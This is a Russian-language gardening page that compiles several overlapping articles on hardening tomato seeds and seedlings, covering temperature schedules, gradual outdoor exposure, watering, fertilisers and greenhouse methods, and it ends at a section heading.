1 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Как закаливать рассаду томатов помидор

Как проводить закаливание рассады помидоров

Закаливание рассады помидоров — важный этап при выращивании. Благодаря такому процессу, корневая система не засыхает, а растение не вянет и дает сочные плоды.

Закаливание рассады помидоров

Татьяна Орлова (канд. с.-х. наук):

Закаливание рассады — это не только повышение ее устойчивости к низкой температуре открытого грунта, но ко всему комплексу внешних воздействий окружающей среды: ветру, жаре, осадкам.

Когда начинать закаливание

Как закалять рассаду помидоров, — частый вопрос, возникающий у садоводов. Здоровую, крепкую и развитую рассаду помидоров получают, только если процесс закалки длится с момента посева семян и до высадки в грунт. Закалка молодых помидоров нужна, чтобы кусты адаптировались к новым условиям выращивания.

Начинать закалять рассаду помидоров рекомендуют весной, в апреле. Правильное закаливание помидоров и подкормка делают растение стрессоустойчивым при пересадке в открытый грунт.

Признаки того, что рассада готова к закаливанию и вскоре может быть пересажена в грунт:

  • Цвет листьев. Они должны быть темно-зелеными с фиолетовым оттенком. При наличии белых или других пятен рассаду закалять не рекомендуется.
  • Состояние стебля. Провисший и падающий под собственным весом стебель показывает, что овощная культура склонна к засыханию. Он должен быть ярко-зеленым и прямым.
  • Корневая система. Если она мощная, крепкая и развитая, то поможет растению прижиться и дать плоды. Желательно, чтобы она имела мочковатую структуру.
  • Состояние листьев. Они должны быть светлыми, с развитой листовой пластиной. Нужно, чтобы междоузлия были короткими.

Растения не рекомендуется высаживать сразу в грунт, если они плохо закалены. В этом случае кусты несколько дней держат в прохладном помещении.

Этапы закаливания

Рассмотрим, как закалить рассаду помидоров после проверки ростков на наличие заболеваний. Процесс закаливания состоит из нескольких этапов.

Подготовка семян

Первый этап — подготовка семян к посеву. Для этого их выкладывают на небольшую часть ткани, помещают ее в миску с водой. Для обеззараживания добавляют несколько капель «Фитоспорина» и накрывают семена другой частью ткани.

В комнате семена держат в таком состоянии примерно день, после чего ставят их в холодильник. Холод и тепло чередуют не более 2 дней. Также обрабатывают закаленные семена марганцовым раствором, после чего высаживают в грунт. Такой процесс обработки дает эффект быстрого созревания и урожайности кустов.

Татьяна Орлова (канд. с.-х. наук):

Закалка набухших семян томата ведется переменными температурами около 1,5-2 недель. Только тогда она даст результат. Целью данной работы является получение рассады, устойчивой к холоду (но не морозостойкой!). Растения томата, выращенные из закаленных семян способны относительно долгое время находится при низкой положительной температуре (+6-8 градусов) в открытом грунте.

Одним из преимуществ закаленного куста является возможность его высадки на несколько недель раньше незакаленного. То же самое касается первой цветочной кисти, которая появляется на 3-4 дня раньше. После высевания семян, закаленных таким образом, ростки всходят уже на 2 день.

Огородники советуют брать семена томатов, которые:

  • пережили заморозки;
  • росли на свежем воздухе;
  • были собраны примерно 2 года назад.

Полив

Спустя 3 недели семена заливают горячей водой на 2 часа, после чего помещают в холодную воду на 3-5 минут. После этого семена готовы к посадке.

Татьяна Орлова (канд. с.-х. наук):

Тепловая обработка семян проводится для уничтожения вирусов и возбудителей некоторых грибных заболеваний, которые могут сохраняться на семенах. Температура воды должна быть 45-50 градусов. Чтобы поддерживать эту температуру на протяжении 2 часов, семена помещают в термос с горячей водой.

Постепенно количество поливов уменьшают. Изначально их проводят при использовании теплой воды, позже ее температуру снижают. Всходы томатов поливают раз в неделю.

Процесс закаливания

Взошедшие ростки через 11-14 дней рассаживают — проводят пикировку. После появления листочков начинается процесс закаливания, который основывается на следующих действиях:

  • Понижение температуры. В помещении, где находится растение, следует понизить температуру с 30°С до 20°C. Со временем растение переносят на балкон или выставляют во дворе примерно на пару часов. В процессе наблюдают за внешним видом листьев. Прямые солнечные лучи росткам противопоказаны.
  • Полив. Нежелательно обильно поливать растение, до того как оно будет вынесено на улицу. Оставлять ростки на свежем воздухе разрешается вечером или утром на 3-4 часа. Это длится 3-5 дней и проводится только перед самой высадкой. Закалка томатов происходит, когда градусник показывает примерно 24°С тепла. Ночью температура должна быть 7-11°С.
  • Сохранность от ветра. Ростки не должны быть расположены на сквозняке. Сильный ветер может испортить состояние листьев, сделать стебель более уязвимым. Бывает, что огородники используют экстремальный подход к закалыванию, где нужна низкая температура и ветреная погода.

Важно постоянно наблюдать за состоянием растения, т.к. при закалывании происходит ухудшение внешнего вида, после чего рассаду заносят обратно в теплое помещение.

Закаливание в домашних условиях

Закаливание рассады молодых помидоров можно реализовать и в домашних условиях. При этом необходимо соблюдать тепловой режим и правила полива.

Чтобы растение чувствовало перепады температуры, нужно выносить его на 2-3 часа и размещать возле окна, после чего снова заносить в теплое помещение. Это позволит закаливать помидоры максимально быстро и эффективно.

Специалисты советуют делать это постепенно и с каждым разом увеличивать время пребывания растения в прохладном помещении. Отличное решение — оставить возле растения градусник, чтобы максимально точно следить за изменениями температуры.

Закалить рассаду помидоров в домашних условиях рекомендуют за 2-3 недели до высадки, после чего ее высаживают в землю и следят за ее реакцией. Во время закалки растение растет медленней, но преимуществом является сильный корень и мощный стебель после процедуры. Закалять рассаду помидоров нужно, ведь это дает растению иммунитет и вкусные плоды.

Применение удобрений

С подкормкой для ростков нужно быть осторожным. Если использовать азотные удобрение во время закалки помидоров, устойчивость растения к морозам снижается, оно заболевает, поэтому в период закаливания рассады из помидоров не стоить применять данную подкормку.

Удобрения, которые можно использовать в процессе закалки:

  • Раствор сернокислого калия. Его берут в количестве 60 г. К нему добавляют 10 г аммиачной селитры, 40 г суперфосфата. Все компоненты растворяют в 10 л воды. Раствор используют за пару дней до высадки в грунт.
  • «Кристаллон» или «Кемира». Они ускоряют приживаемость растения, способствуют снижению негативного воздействия пестицидов. «Кемира» насыщена микроэлементами: бором, молибденом, марганцем, железом, азотом. 2 ст. л. удобрения растворяют в 20 л воды, а для рассады весь пакет растворяют в 20 л.
  • Жидкий раствор из двойного суперфосфата. Всего понадобится 80 г, к нему кладут 30 г калийной селитры. Опрыскивание происходит в период образования завязей.

Подкормку вносят как на куст, так и в корневую систему. Особенно популярно опрыскивание листьев, так как через них растение принимает больше полезных элементов. Для раствора используют отстоянную либо дождевую воду.

Закаливание рассады помидор

Помидоры одна из культур, которая любит тепло и очень боится заморозков. Чтобы не случилась ситуация, когда вы вырастили мощную красивую рассаду, а при посадке в открытый грунт, она сразу завяла, необходимо проводить закалку рассады и семян. Закаливание обеспечит растению хороший иммунитет. В будущем такие кусты будут давать отменный урожай.

Зачем закалять рассаду?

Суть закаливания состоит в том, чтобы растения привыкли существовать в разных погодных условиях. Поскольку растение взрастало в теплице или в помещении, где несвойственны внезапные скачки температур, сквозняки и сильные порывы ветра, после высадки его в почву оно может погибнуть. Чтобы такого не случилось, нужно выполнять закаливание.

Покупка закаленной рассады

Выбирая рассаду с целью приобретения, следует знать характерные особенности закаленных растений. Вот несколько признаков, по которым вы сможете отличить закаленную рассаду от обычной:

  • устойчиво стоит;
  • темно-зеленоватого тона листья слегка с фиолетовым;
  • стебель и листья часто покрыты ворсинками;
  • первая кисть завязей расположена выше первого листа;
  • завязи сформированы через каждый листок.

Закаливание собственной рассады

Чтобы не рисковать и не приобретать некачественно закаленную рассаду помидоров, можно закаливать ее самостоятельно. Процесс закаливания состоит из нескольких этапов.

Первый этап – закаливание семян. Если у вас имеются семена, которые лежат несколько лет, то лучше взять их. Если же такие семена отсутствуют, то новые предпочтительней хранить в закрытой емкости в темном прохладном месте. Накануне закаливания с семенами проделываются следующие манипуляции:

  1. Выберите самые крупные семена.
  2. Бросьте семена в воду, те, что всплыли, выбросите.
  3. Обеззараживайте семена с использованием 3% перекиси водорода в течение 8 минут или 1% раствором марганцовки в течение 20 минут.

Разместите в контейнер хлопчатобумажную ткань и оставьте края, чтобы в будущем накрыть ими семена. Залейте воду высотой в 1 см. По надобности можно долить небольшое количество «Фитоспорина», у него обеззараживающее действие. Затем сутки семена стоят в комнате, на следующие сутки в холодильнике. И так сменяют тепло и холод, еще 2 дня. После проделанных мероприятий семена высаживайте в землю.

Вода не должна полностью замерзнуть, а лишь слегка покрыться коркой льда.

Преимущества закаленных семян:

  • первые зачатки появляются через 2 дня и сразу с листочками вверх;
  • можно сажать в землю на 2 недели раньше, чем обычные семена;
  • урожайность увеличится в 2 раза;
  • цветочная кисть развивается через один лист и на 4 дня раньше, чем обычно.

Второй этап – закаливание взошедшей рассады помидоров. Спустя неделю нужно произвести орошение помидоров. После появления крепких листочков, можно начинать процедуру закаливания. Для начала нужно понемногу снижать температуру открыванием форточки на 3-4 часа в помещении, где находятся растения. Проделывать это рекомендуется утром или вечером. В последующие дни попробуйте выносить томаты на веранду или улицу в течение 4-5 часов, но обязательно отслеживайте реакцию растений на неблагоприятные условия. Если все в порядке, с каждым днем повышайте пребывание томатов на воздухе на 1-2 часа. Категорически запрещается выносить рассаду в дождливые и ветреные дни. Не забывайте защищать растения от прямого попадания ультрафиолетовых лучей. Перед посадкой в почву, вынесите ее постоять 3 дня на улице.

Не стоит поливать почву, перед транспортировкой рассады на свежий воздух.

Что нельзя делать при закаливании рассады помидор

Есть часто встречающиеся ошибки при закаливании, которые следует знать:

  • рассада не должна находиться на сквозняке;
  • полив следует осуществлять только после того, как рассада была занесена в дом;
  • в первый дни не оставляйте томаты на улице на всю ночь, начинайте с малого;
  • не позволяйте УФ лучам оказываться на листья;
  • увидев увядание листьев, срочно занесите растения в жилье;
  • не оставляйте рассаду под дождем и во время сильного ветра;
  • прекратите использование подкормки на период закаливания.

Когда начинать закаливание

Опытные огородники советуют начинать закаливание в зимне-весенний период. Ниже приведены 3 критерия, по которым поймете готово или нет растение к закаливанию:

  1. В норме цвет листьев должен быть светло или темно-зеленого тона. Если на листьях имеются пятна неясного характера, проводить закаливание не стоит.
  2. Стебель прямой и ярко-зеленого тона готов к закаливанию, если же он вялый и провисает под собственным весом — закалять не рекомендуется.
  3. Корневая система обязана быть крепкой и хорошо развитой. Это увеличивает процент прижиться растению в грунте.

Способы закаливания

Поскольку помидоры находятся в разных условиях взращивания или вы не знаете возраст семян, существуют разные способы закаливания, которые помогут вам добиться хорошего урожая. Подробнее разберем каждый способ:

  • Традиционный способ. За 1,5 – 2 недели до высадки в почву начинают закаливание. Закаливание советуют осуществлять при температуре 16-20 градусов в дневное время, и 8-15 градусов в ночное. Прерывайте поливку на неделю, и транспортируйте помидоры в прохладное место в утренние часы и заносите поздно вечером. С каждым днем длительность присутствия на улице продлевайте на 2 часа. По прошествии недели, рассаду перемещайте на улицу на 2 часа, и с каждым днем увеличивайте это время в два раза. Перед высадкой оставьте ее на улице на 3 дня при условии хорошей погоды без заморозков и ветра.

Лучшего эффекта можно добиться, если закаливать не только рассаду, но и семена.

Особенности закаливания рассады, растущей в теплице и горшках

Так как растения из теплицы нельзя перемещать, есть некие особенности закаливания. За две недели до посадки помидор приступайте к снижению температуры в теплице. С каждым днем снижение температуры повышайте. Убавьте количество и интенсивность поливов. А за неделю до посадки, полностью прекратите полив.

  1. Первые дня 3 открывайте дверь в теплице на 3-4 часа.
  2. С наступлением 4 дня поднимите края пленки на 30 см и оставьте на 5 часов.
  3. С каждым днем поднимайте пленку больше и выше и продолжительность времени увеличивайте на 2 часа.
  4. Собственно перед посадкой за 3 дня пленку с теплицы полностью уберите.

Алгоритм действий закаливания в горшочках:

  1. Для удобства транспортировки разместите горшочки с растениями в пластиковые контейнеры, если такие имеются или же в тазы.
  2. За две недели принимайтесь к сеансу закаливания, вынесите растения на свежий воздух при минимальной температуре 10 градусов на 3 часа. Не забудьте укрыть помидоры от прямых солнечных лучей.
  3. На 3 день транспортируйте растения на улицу, на 6 часов.
  4. С 4 дня оставьте рассаду на улице в течение всего дня и только ночью переместите их в теплое место.
  5. Перед посадкой оставьте контейнеры с рассадой на улице на три дня.

Немаловажно в это время тщательно следить за состоянием рассады, если листья начинают увядать, опустите пленку и восстановите прежний вид растения. Только после восстановление можно снова приступать к сеансу закаливания.

Признаки готовности рассады для посадки на открытой местности:

  1. Имеется 10-12 крепких листьев.
  2. Рост растения 20-30 см.
  3. Наличие 1-2 завязи соцветий.

Помидоры любимы всеми, но есть сорта, что особенно популярны и вкусны, к тому же ещё и опытом проверенные. Если вам нужен…

Заключение

Закаливание рассады помидоров очень важная процедура, если вы хотите щедрый урожай. Процедура несложная, но требует от огородника неких усилий и терпения в таком процессе, а точнее систематичность и регулярность выполнения. Соблюдая все правила и рекомендации, вы снизите риск заболевания и стрессов для растения. А взамен за свои усилия получите крепкие кусты, которые не завянут даже в самых неблагоприятных условиях.

Как закалять рассаду томатов в домашних условиях

Общие сведения о культуре

История помидоров насчитывает несколько столетий. Первые сведения об этом овоще появились еще во времена испанских конкистадоров, которые по предположению историков и завезли их в Европу из Перу и Эквадора. Там эта культура долгое время выращивалась в декоративных целях и называлась «томатль». Во многих странах мира она получила наименование, созвучное слову «томатто», равнозначного русскому «помидоры».

Томаты характеризуются сравнительно длительными периодами, проходящими от момента, когда появился первый всход рассады, и до окончательного созревания плода. Указанный недостаток не помешал этой культуре стать самой популярной во всем мире (по крайней мере, среди овощных растений).

К характерной черте этого овоща можно отнести также то, что его сезонное выращивание организуется путем высадки молодой поросли, которая на первых порах достаточно слаборазвита и практически беспомощна.

Как закалять рассаду томатов в домашних условиях

Вот почему закаливание рассады помидоров при какой температуре оно проводится в домашней обстановке, относится к важнейшим положениям агротехнической культуры, которым следует уделить пристальное внимание. Рассмотрим все, что касается закалки более детально (включая пошаговый план проведения соответствующих процедур).

Зачем нужно закаливание

Большинству садоводов известно, что закалка рассады томатов является обязательной процедурой, необходимой для того, чтобы предотвратить стресс, возможный у молодняка при его пересадке в грунт. Этот эффект возникает вследствие обновления всей обстановки, окружающей еще не закаленный росток, поскольку он попадает не только в другой климат, но и в другую почву.

Для адаптации к обновленным условиям его корням нужно какое-то время, то есть ко всему этому растение должно привыкать постепенно. Для полного понимания целей «тренировки» любой культуры важно разобраться в тонкостях и деталях самого процесса под названием «закаливание». Все эти нюансы могут быть сведены к перечню следующих основных проблем:

  • Каковы особенности подготовки рассады;
  • Какая температура воздуха выбирается для получения максимального эффекта;
  • Влияние сорта томата на характер самого процесса;
  • Как закалять рассаду томатов в домашних условиях.

Исследуем каждый из этих пунктов более подробно. Попутно рассмотрим порядок закаливания рассады томатов совместно со схожей с ними культурой перец.

Как закалять рассаду томатов в домашних условиях

Подготовка к смене условий

В том случае, когда местом для предварительного содержания поросли помидоров были выбраны подоконник или теплица, перенос ее в новое место означает резкую смену климата и возможность влияния на рост растения сквозняков, например. Именно поэтому подготовка его к пересадке означает, в первую очередь, «тренировку» для перехода на новый температурный режим и привыкание к пока еще опасным сквознякам.

Дополнительная информация. Даже такое защищенное место, как теплица, не гарантирует, что от случайного движения воздуха молодняк не получит сильный стресс.

Следствием данного эффекта, наблюдаемого при пересадке в грунт (в сочетании с другими угрозами), является либо постепенная гибель зеленых ростков, либо их продолжительная болезнь.

Так называемая «закалка» как раз состоит в том, чтобы исключить резкий переход от привычных условий обитания к совершенно неподходящей для рассады обстановке.

Различные сорта томатов могут закаливаться по самым разным, существенно отличающимся одна от другой схемам, предполагающим учет особенностей этого вида. Все данные по указанной процедуре может содержать инструкция, прикладываемая к пакетику с семенами, а также специальные информационные листки, распространяемые по подписке в Интернете.

Как закалять рассаду томатов в домашних условиях

Анализ этой темы показал, что лучше всего закаливанию поддается тот помидорный сорт, который предназначается для ранней высадки в почву и отличается (согласно своему описанию) повышенной морозоустойчивостью.

Виды закаливания семян

Перед тем, как закалять рассаду помидор, следует разобраться с существующими методами подготовки самих семян. Их рассмотрение начнем с того, что правильный подход к домашнему проращиванию предполагает использование материала 2 или даже 3-х годичной давности. Если же в наличие имеется только свежий «семенной фонд», его желательно искусственно «состарить» с одновременной закалкой.

С этой целью семена сначала насыпаются в чистый холщовый мешочек и помещаются на 2-3 недели в теплое и затемненное место.

Дополнительная информация. Раньше в деревенских избах для этого использовалась печка, которую в настоящее время может подменить комнатная батарея отопления.

Прямо перед высадкой семенной материал закаляют за счет создания разницы температур, что означает выдерживание его в течение 120-ти минут в горячей воде с последующим окунанием на 2-3 минуты в холодную.

Как закалять рассаду томатов в домашних условиях

Существует более эффективный, хотя и сравнительно сложный способ закаливания семян помидор, суть которого состоит в следующем:

  • В не очень глубокую миску сначала укладывается кусочек чистой и мягкой ткани, ширина которой равна диаметру посудины, а длина превышает его в два раза;
  • Затем на ткань насыпаются семена томатов, которые аккуратно разравниваются тонким слоем;
  • Далее эту ткань перегибают так, чтобы одна ее половинка полностью накрывала семена, после их заливают водой до отметки около 1-1,5 см;
  • В этом состоянии замоченный материал содержится при домашней температуре примерно сутки, по истечению которых его помещают на то же время в холодильник.

Описанный выше цикл закалки повторяется дважды с одновременным контролем температуры в холодильнике (она должна быть на уровне около 2-х градусов).

Обратите внимание! Температурный режим можно проверить по состоянию воды, которая должна образовывать тонкую корочку льда по краям емкости.

Известен еще один, чем-то схожий с рассмотренным выше приемом способ домашней закалки семян. Они в этом случае также насыпаются в мешочек, который затем кладется в литровую кружку или в глубокую миску. Выбранную емкость с семенами сверху присыпают снегом или льдом из холодильника и оставляют на подоконнике. После таяния содержимого миски воду сливают и повторяют процедуру еще раз (по ее завершении можно рассаживать закаленные семена на грядку).

Закалка рассады вне дома

Подобно человеческому организму молодая поросль нуждается в систематической и постепенной закалке. Регулировать температуру в месте, где содержатся ящики с высеянными семенами, следует начать ориентировочно через 5 суток после того, как из закаленных зерен проклюнутся первые всходы. В случае нарушения этого правила росточки быстро вытянутся вверх и могут просто «перерасти» свою норму.

Как закалять рассаду томатов в домашних условиях

Обычно к проведению этой процедуры приступают где-то за 1,5-2 недели до высадки рассады в незащищенные грядки или парник. Все эти действия рекомендуется проводить в следующем порядке:

  • Прежде всего, примерно за 6-7 дней до начала закалки рассаду томатов совсем перестают поливать, а затем выносят из теплой комнаты в помещение, где температура значительно ниже;

Дополнительная информация. Это может быть веранда на даче или лоджия в квартире (закрытый балкон). Для самой первой закалки принято выбирать теплый день с обилием солнечных лучей.

  • В эти первые разы небольшие ростки в ящиках выносятся примерно через 2-3 часа после солнечного восхода, пока температура вне дома поднимается чуть выше 10 градусов, а вечером заносятся обратно в квартиру;
  • Для каждых последующих суток продолжительность пребывания вне помещения увеличивают приблизительно на 2-3 часа;
  • Спустя 5-6 дней после начала этих процедур помидорную рассаду начинают выносить прямо на улицу (в квартире – на лоджию или балкон с открытыми окнами);
  • По времени пребывания вне дома в первый раз можно ограничиться 1-2-мя часами;
  • На вторые сутки этот срок следует увеличить до 3-4-х часов, на третьи – до 7-8; на четвертый день она оставляется на свежем воздухе практически на весь день.

Где-то примерно за 3-4 дня до высадки, при условии благоприятной (не очень морозной) погоды, горшочки или ящики с молодой рассадой не заносят в дом совсем, оставляя их на улице всю ночь. Эту процедуру следует повторить до трех раз подряд и более. Переносить на незащищенные грядки рассаду, которую «тренировали» на пребывание вне пределов дома менее 3-х суток, очень опасно (она элементарно может заболеть).

Как закалять рассаду томатов в домашних условиях

При наличии в данной местности большого количества ветряных дней рекомендуется использовать для закаливания ветер. Этот метод следует применять в виде исключения, когда плохая погода не позволяет заняться традиционными процедурами.

Важно! При нежелании рисковать с непроверенным способом закалки лучше дождаться хорошей погоды и провести ее по классической схеме.

Вне зависимости от того, какой способ закалки выбран для данного сорта помидоров, на протяжении всего этого процесса следует внимательно наблюдать за поведением молодых росточков, реагируя на малейшие изменения в их состоянии. Особенно важно делать это в самые первые сутки, то есть во время, когда предсказать реакцию поросли на резкую смену обстановки практически невозможно.

При обнаружении малейших отклонений в ее внешнем виде (если она начала вянуть или бледнеть, например) емкости с рассадой следует немедленно возвратить в привычную для развития обстановку. Продолжать закаливание можно будет лишь после того, как ростки понемногу восстановятся (подлечатся).

Как закалять рассаду томатов в домашних условиях

Закаливание перца

В этом разделе коротко рассматривается вопрос закаливания рассады сопутствующей томатам культуры – перца. Молодую поросль этого овоща, прежде чем рассадить в теплице вместе с помидорами, принято закаливать улицей. Приступать к этой процедуре рекомендуется примерно за месяц до конкретной даты, на которую назначена посадка в почву на огороде.

Для этого в течение определенного времени, растянутого почти на 10 дней, потребуется выносить емкости с рассадой на улицу, оставляя их на день в тени, а ближе к ночи заносить обратно в теплое помещение.

В том случае, если температура за пределами дома ниже 15-ти градусов, и наблюдается сильный ветер, днём рассаду желательно содержать на балконе (или же открыть окно в комнате, не создавая при этом сильных сквозняков). Данная процедура поможет ей достаточно быстро привыкнуть к условиям вне здания, что удается проконтролировать по цвету листьев (они должны иметь ярко-зеленый оттенок).

К моменту высадки на грядки хорошо закаленные всходы перца должны иметь порядка 10-ти маленьких листочков.

Как закалять рассаду томатов в домашних условиях

Особенности закалки в доме

Для того чтобы закалить рассаду в домашней обстановке (подготовить ее к уличной закалке), в жилых комнатах следует поддерживать строго фиксированную низкую температуру. В первую неделю роста она не должна превышать днем 13-16, а в ночное время – порядка 11-13 градусов.

Для поддержания указанного режима при закаливании томатов в домашних условиях ящички с рассадой рекомендуется выносить на балкон или на хорошо проветриваемую лоджию.

Обратите внимание! Достичь таких сравнительно низких температур удается либо ранней весной, либо в очень холодные утренники.

В дальнейшем перед тем, как начать закаливать ее на улице, температуру в квартире или на балконе следует поднять днем до 18-22-ти, а ночью – до 17-18-ти градусов. После того, как у ростков появится первый полноценный листочек, ночную температуру вновь необходимо понизить до 10-13-ти градусов.

Далее вплоть до заметного разрастания зелени режим ее содержания менять нежелательно (каждый саженец при этом должен контролироваться отдельно). Примерно за неделю до предполагаемого переноса в почву ночная температура очень медленно понижается (где-то за 3-4 дня перед этим она должна сравняться с уличным показателем).

В заключительной части обзора отметим, что аналогичным образом следует уменьшать дневную норму температуры, но только чуть медленнее. Окончательно закалиться в домашних условиях рассада должна не ранее, чем за 14 дней и не позже, чем за 10 дней, до высадки на грядку.

То в тепле, то в холоде — для чего закаливают помидоры: сроки, схемы, результат

Выращенная в помещении рассада чутко реагирует на изменения окружающей среды. Крепкая и здоровая в теплице, в открытом грунте без закаливания она быстро погибает. Чтобы этого не произошло, сеянцы перед высадкой в открытый грунт необходимо закалить.

Необходимость проведения закаливания рассады

Помидорные ростки, выращенные дома или в парнике, привыкают к постоянному микроклимату. Для маленьких растений (особенно после пикирования), наступает настоящая благодать: много тепла, света, нет сквозняков.

На данном этапе знающий огородник начинает постепенно приучать рассаду к реальным погодным условиям.

Если этого не делать, молодняк плохо перенесет высадку в открытый грунт (солнечные ожоги, инфекционные заболевания, увядание вследствие резкого перепада суточных температур).

На закаленной помидорной рассаде образуется мощный эпидермальный слой, благодаря которому молодым росткам не страшны скачки температуры и влажности на улице.

Сеянцы, прошедшие закалку, быстрее адаптируются к условиям открытого грунта, меньше подвержены заболеваниям.

Какой смысл в самом процессе закаливания томатов

Закаливание рассады необходимо в связи с особенностями климатических поясов нашей страны. У большинства огородных культур период вегетации составляет 140-200 дней, что значительно ниже количества дней с оптимальной температурой для роста и развития растения (примерно 150 дней в году).

Посев семян можно проводить с апреля по май, им не страшны возможные заморозки, чего не скажешь о рассаде. Таким образом, высаженные молодые ростки в конце мая — начале июня, успевают набраться сил, дать урожай до начала холодов.

Необходимые условия

Для получения крепких саженцев необходимо проводить закаливание на протяжении всего выращивания сеянцев в помещении. Происходит постепенное приучение растений существовать в открытом грунте.

Закаливание рассады начинают с появлением первых 4 настоящих листочков. Первую неделю старайтесь, чтобы температура в комнате была от 16°С до 18°С днем и от 14°С до 15°С ночью. Через неделю температуру нужно повысить на 2°С соответственно.

  1. Температура воздуха на улице должна прогреться до 14–16°С на солнце.
  2. Выносить рассаду на улицу разрешается только в безветренную погоду.
  3. Ростки с признаками корневой гнили, тонкие, слабые, закаливать нет необходимости. Лучше сразу уничтожить.
  4. Сеянцы готовы к высадке в открытый грунт, если провели на улице несколько суток без негативных последствий.

Когда необходимо закалять рассаду, для чего нужен этот процесс, как выглядят листья, которые готовы к закаливанию — эти и другие советы дает автор видео.

Методы закаливания рассады помидоров у вас дома

Рассаду выращивают в парниках, теплицах, на подоконниках, балконах, просто в пластиковых стаканчиках. Способ выращивания не влияет на принципы закаливания.

Если ящики с рассадой у вас на подоконнике, ежедневно открывайте форточку в середине дня, начиная с нескольких минут, постепенно доводя время до одного-двух часов. Старайтесь, чтобы первое время прямые солнечные лучи не попадали на молодые листья.

Полив сеянцев производят 1 раз в неделю. Для этого используют лейку с мелкими отверстиями или разбрызгиватель. Не допускайте сильного увядания растения.

Следующим этапом будет вынос ящиков с молодыми растениями на улицу, в первый раз достаточно на 1 час. Закаливать сеянцы следует ежедневно, постоянно увеличивая пребывание на свежем воздухе в зависимости от погоды.

Перед выносом на улицу поливать молодняк не надо.

Когда подойдет время высаживать саженцы, поместите ящики с рассадой на улицу на 2 дня, желательно в безветренную погоду.

Если сеянцы находятся в теплице, в первые несколько дней открывают двери, постепенно продлевая проветривание на 1–2 часа.

Температура воздуха в теплице не должна превышать наружную больше, чем на 2°С (исключение составляет время заморозков).

Впоследствии, просто поднимают пленку, следя за тем, чтобы растения не получили ожоги прямыми солнечными лучами.

Если рассада начала вянуть, пленку возвращают на место. При нормальной реакции теплицу оставляют открытой даже ночью (если нет угрозы заморозков).

Одним из важных условий закаливания является сокращение полива. Прекращаем полив за 7-10 дней до высадки в открытый грунт. Увеличение срока снижает развитие растений, негативно сказывается на будущем урожае. Не следует допускать увядание сеянца, пересушку земляного кома.

Правила ухода за рассадой

Существуют некоторые правила по уходу за рассадой:

  • Емкости с побегами должны располагаться на хорошо освещенном пространстве.
  • Недопустимы сквозняки, постоянно открытые окна, двери (даже в теплую погоду).
  • В первые дни закаливания старайтесь оградить молодые побеги от прямых солнечных лучей. Пусть они принимают солнечные ванны не больше 20 минут в день. Примерно через две недели сеянцы можно оставлять под солнцем на весь световой день.
  • Полив проводите не частый. Не допускайте пересыхания земли, ее комкования.
  • При внезапных заморозках, если молодые ростки находится в неотапливаемом помещении, перенесите ящики в тепло.
  • При коротком световом дне необходима дополнительная подсветка для сеянцев. Для помидоров она составляет до 18 часов в сутки.
  • За пару дней до высадки растений в открытый грунт следует их подкормить любым комплексным удобрением. Подкормка поможет быстрее адаптироваться к новым условиям, значительно повысит приживаемость сеянцев.

При правильном закаливании и хорошем уходе рассада дает мощные, развитые томатные кусты, что гарантирует отличный урожай.

Полезные советы

  • Для рассады удобно использовать жестяные баночки из — из-под консервированного горошка, кукурузы. Дно пробиваете толстым гвоздем. Получившиеся изнутри заусеницы дают приток воздуха к корням. На дно насыпаете дренаж (шелуха от семечек, спитой чай), затем землю. Если грунт засыпать не до самого верха банки, по ее краям можно пустить полоску фольги (от шоколада). Это усилит освещение саженцев.
  • Используйте для выращивания сеянцев такую почвенную смесь: 1 ведро земли из дубовой рощи + 500 г песка + 3 литра перегноя + 1 стакан с верхом древесной золы. Все перемешать, разложить в ящики, оставить при уличной температуре для промерзания. В нужное время внести в теплое помещение, дать земле прогреться, можно начинать посев семян.
  • Покупная рассада тоже нуждается в закалке. Обычно, достаточно 3 дней. Поместите на это время саженцы под кружевную тень или воткните возле каждого ветку с листьями. На ночь рассаду следует укрыть.
  • Для подсветки используйте лампы: кварцевые или дневного света. Лампы накаливания не подойдут. Они приводят к перегреву верхушек молодняка.
  • Не пытайтесь спасти растения, пораженные гнилью (черной ножкой). Вы успеете получить новые сеянцы из семян другой партии. Зараженный грунт необходимо выкинуть, заменив новым. Ящики продезинфицировать.
  • При загущенном посеве семян ростки вырастают слабые, с неразвитой корневой системой. Закаливание и подкормка мало спасут в этой ситуации. В таком случае не стоит надеяться на хороший урожай.
  • Выращивать и закаливать молодые растения в домашних условиях начинайте немного раньше, чем в теплицах и парниках.
  • Первые три недели листья у ростков растут медленно, почти незаметно. Зато в последующие дни рост их заметно ускоряется.
  • Самыми худшими условиями для роста и развития рассады томатов являются сильная жара, плохая освещенность, сильно увлажненная почва.

Очевидным фактом является то, что хорошо проведенная закалка гарантирует полную приживаемость сеянцев на новом месте, способствует дальнейшему росту и развитию растений, и как следствие — обильный урожай плодов.

Закаливание рассады томатов

Закаливание рассады помидор в домашних условиях — важный агротехнический прием, которым никогда нельзя пренебрегать. Иначе может получиться так: вы вырастили прямо-таки роскошную рассаду, принесли ее на грядку, посадили с соблюдением всех норм и рекомендаций, и со спокойной совестью отправились вечером спать. А на утро высаженную рассаду не узнать: вся скукожилась, пожелтела, всем своим видом показывая, как ей на вашей грядке холодно и неуютно. Знакомая картина, не правда ли?

Зачем закалять рассаду?

Причина в том, что вы прямо из теплицы или из помещения высадили на грядку незакаленную рассаду. Вот она и заболела, «простудилась». Часто такая рассада пропадает, но даже если выживет, на хороший урожай уже можете не рассчитывать.

Объясняется все просто. При пересадке, особенно в открытый грунт, растения неизбежно испытывают сильный стресс: новое место, новые условия, новая почва, с которой корням растения еще нужно установить контакт, «прижиться».

В теплице или помещении рассада спокойно росла в стабильной обстановке, избавленная от любых негативных проявлений открытого грунта: резких колебаний температуры, сквозняков и т.п. Что будет, если ее одним махом лишить привычной обстановки и высадить на грядку? Правильно, будет еще один сильный стресс.

Наложение друг на друга этих двух сильных стрессов и приводит к тому, что пересаженная рассада гибнет или, в лучшем случае, долго и тяжело болеет. Закаливание рассады помидор как раз и позволяет если и не полностью предохранить рассаду от второго стресса, то по максимуму смягчить его последствия.

Суть закалки как раз и заключается в том, чтобы не резко, а постепенно приучить рассаду существовать в условиях открытого грунта, т.е. сделать так, чтобы к моменту пересадки условия на открытой грядке стали для нее уже знакомыми, «своими».

К тому же, огородники давно подметили побочное, но очень важное последствие закалки. Во время закалки у растений активно начинает развиваться корневая система, и к моменту высадки она становится мощной, «мочковатой», а сами растения хотя и притормаживают в росте, но зато станут плотнее, «коренастее». Происходит это потому, что вследствие закалки растения как защитную реакцию увеличивают толщину своего эпидермиса и накапливают в стеблях и листьях запасы сахара.

Закалка семян

